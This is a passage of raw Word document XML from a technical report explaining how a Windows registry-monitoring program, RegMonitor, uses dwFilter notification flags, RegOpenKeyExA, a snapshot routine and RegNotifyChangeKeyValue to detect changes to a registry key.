        <w:t>RegMonitor sets a value called “dwFilter” for storing value that based on it we use to monitor the registry</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dwFilter = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>REG_NOTIFY_CHANGE_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> |</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REG_NOTIFY_CHANGE_ATTRIBUTES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> |</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REG_NOTIFY_CHANGE_LAST_SET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0640C" w:rsidRDefault="00B0640C" w:rsidP="00B0640C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="0" w:firstLine="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REG_NOTIFY_CHANGE_SECURITY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0640C" w:rsidRDefault="00B0640C" w:rsidP="00B0640C">
      <w:r>
        <w:t xml:space="preserve">The values set to dwFilter indicate the specific aspects that a registry key </w:t>
      </w:r>
      <w:r w:rsidR="000D4E08">
        <w:t>must</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be monitor. These values and their meanings are described in the following table.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3033"/>
        <w:gridCol w:w="5737"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B91AB3" w:rsidTr="00B91AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2820" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00B91AB3" w:rsidRPr="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B0640C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B91AB3">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5950" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00B91AB3" w:rsidRPr="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B0640C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B91AB3">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B91AB3" w:rsidTr="00B91AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2820" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B0640C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>REG_NOTIFY_CHANGE _NAME</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B0640C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>0x00000001L</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5950" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B0640C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B91AB3">
              <w:t>Notify the caller if a subkey is added or deleted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B91AB3" w:rsidTr="00B91AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2820" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B91AB3">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>REG_NOTIFY_CHANGE _ATTRIBUTES</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B91AB3">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>0x00000002L</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5950" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B0640C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B91AB3">
              <w:t>Notify the caller of changes to the attributes of the key, such as the security descriptor information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B91AB3" w:rsidTr="00B91AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2820" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B91AB3">
            <w:r>
              <w:t>REG_NOTIFY_CHANGE _LAST_SET</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B91AB3">
            <w:r>
              <w:t>0x00000004L</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5950" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B0640C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B91AB3">
              <w:t>Notify the caller of changes to a value of the key. This can include adding or deleting a value, or changing an existing value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B91AB3" w:rsidTr="00B91AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2820" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B91AB3">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>REG_NOTIFY_CHANGE _SECURITY</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B91AB3">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>0x00000008L</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5950" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B91AB3">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B91AB3">
              <w:t>Notify the caller of changes to the security descriptor of the key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B91AB3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc484886366"/>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00345B0F">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00345B0F">
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00345B0F">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00345B0F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00345B0F">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00345B0F">
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00345B0F">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00345B0F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dwFilter values and their meanings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w:rsidR="00B0640C" w:rsidRDefault="00B91AB3" w:rsidP="00B91AB3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidRPr="00224EDD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://msdn.microsoft.com/en-us/library/windows/desktop/ms724892(v=vs.85).aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B91AB3" w:rsidRDefault="000D4E08" w:rsidP="00B91AB3">
      <w:r>
        <w:t xml:space="preserve">RegMonitor creates 2 Registry Handle for storing 2 parts of the parsed key. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D4E08" w:rsidRDefault="000D4E08" w:rsidP="000D4E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HKEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   hMainKey;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D4E08" w:rsidRDefault="000D4E08" w:rsidP="000D4E08">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HKEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   hKey;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D4E08" w:rsidRDefault="00401671" w:rsidP="000D4E08">
      <w:r>
        <w:t xml:space="preserve">The handle variable hMainKey is used to store a handle value for the specified main key. Since </w:t>
      </w:r>
      <w:r w:rsidR="006235EF">
        <w:t xml:space="preserve">Windows API does not used strings (like HKLM, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006235EF">
        <w:t>HKCU,…</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006235EF">
        <w:t>) for working with Registry, we have to map these strings into Registry Handle values.</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Convert parameters to appropriate handles.</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strcmp(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"HKLM"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, achMainKey) == 0) hMainKey=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE</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if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>strcmp(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"HKU"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, achMainKey) == 0) hMainKey=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HKEY_USERS</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if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>strcmp(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"HKCU"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, achMainKey) == 0) hMainKey=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER</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if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>strcmp(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"HKCR"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, achMainKey) == 0) hMainKey=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HKEY_CLASSES_ROOT</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if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>strcmp(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"HCC"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, achMainKey) == 0) hMainKey=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_CONFIG</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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>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"Usage: notify [HKLM|HKU|HKCU|HKCR|HCC] [&lt;subkey&gt;]\n"</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6235EF" w:rsidRDefault="006235EF" w:rsidP="006235EF">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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006235EF" w:rsidRDefault="00350C9B" w:rsidP="006235EF">
      <w:r>
        <w:t>Depends on the main key value stored in “achMainKey”, RegMonitor map</w:t>
      </w:r>
      <w:r w:rsidR="001A6FED">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to a regist</w:t>
      </w:r>
      <w:r w:rsidR="001A6FED">
        <w:t>ry handle value and stores it in hMainKey.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A69C8" w:rsidRDefault="00D42C86" w:rsidP="006235EF">
      <w:r>
        <w:t xml:space="preserve">RegMonitor later reads the key using </w:t>
      </w:r>
      <w:r w:rsidR="004A69C8">
        <w:t>a function called “RegOpenKeyExA” for opening the key using 3 primary values:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A69C8" w:rsidRDefault="004A69C8" w:rsidP="004A69C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>hMainKey: a handle point to a specified root key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A69C8" w:rsidRDefault="004A69C8" w:rsidP="004A69C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>achSubKey: a string storing the subkey. This subkey belongs to the root key above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00152570" w:rsidRDefault="004A69C8" w:rsidP="00152570">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>hKey: a handle that stores the returned registry key handle for the opened key.</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Open and read specified registry key.</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lErrorCode = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>RegOpenKeyExA(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">hMainKey, </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achSubKey, </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KEY_NOTIFY</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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>KEY_READ</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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>KEY_QUERY_VALUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </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&amp;hKey);</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lErrorCode !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ERROR_SUCCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</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"Error in RegOpenKeyEx (%d).\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, lErrorCode);</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152570" w:rsidRDefault="00152570" w:rsidP="00152570">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45C09" w:rsidRDefault="00245C09" w:rsidP="00D17EE5">
      <w:r>
        <w:t>For identifying changes that happened to the registry, RegMonitor calls RegQuery twice. At the first call, RegQuery snapshots the specified registry key using the “hKey” handle and return the current number of the subkey and value belonging to that monitored key. Along to those numbers, RegQuery also return names of the last subkey and the last value in Registry subkey and value chains.</w:t>
      </w:r>
      <w:r w:rsidR="00D17EE5">
        <w:t xml:space="preserve"> We will discuss about RegQuery in the following section.</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//Snapshot Registry Before Change</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RegQuery(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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//Handle to registry key which is being monitored</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hKey,</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//The number of current subkey that will be returned.</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&amp;nSubKeys,</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//The number of current value that will be returned</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&amp;nValues,</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//Indicate whether there is any change happened</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FALSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,</w:t>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achMainKey, </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achSubKey,</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//Name of last subkey in subkey chain</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lpLastSubkeyName,</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//Name of last value in value chain</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lpLastValueName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>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DF6B0B" w:rsidRDefault="00DF6B0B" w:rsidP="00D17EE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>RegMonitor creates an event and calls a Windows API named “RegNotifyChange KeyValue”. RegNotifyChangeKeyValue takes 3 primary arguments:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6B0B" w:rsidRDefault="00DF6B0B" w:rsidP="00DF6B0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>hKey: The current monitored registry key handle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6B0B" w:rsidRDefault="00DF6B0B" w:rsidP="00DF6B0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>dwFilter: The DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6B0B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
